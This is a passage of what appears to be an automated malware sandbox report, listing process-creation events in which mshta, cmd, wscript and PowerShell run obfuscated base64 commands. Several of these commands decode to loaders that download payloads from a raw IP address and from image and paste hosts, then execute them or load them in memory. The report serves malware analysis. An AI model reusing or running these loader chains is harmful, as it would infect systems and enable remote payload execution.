c2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyR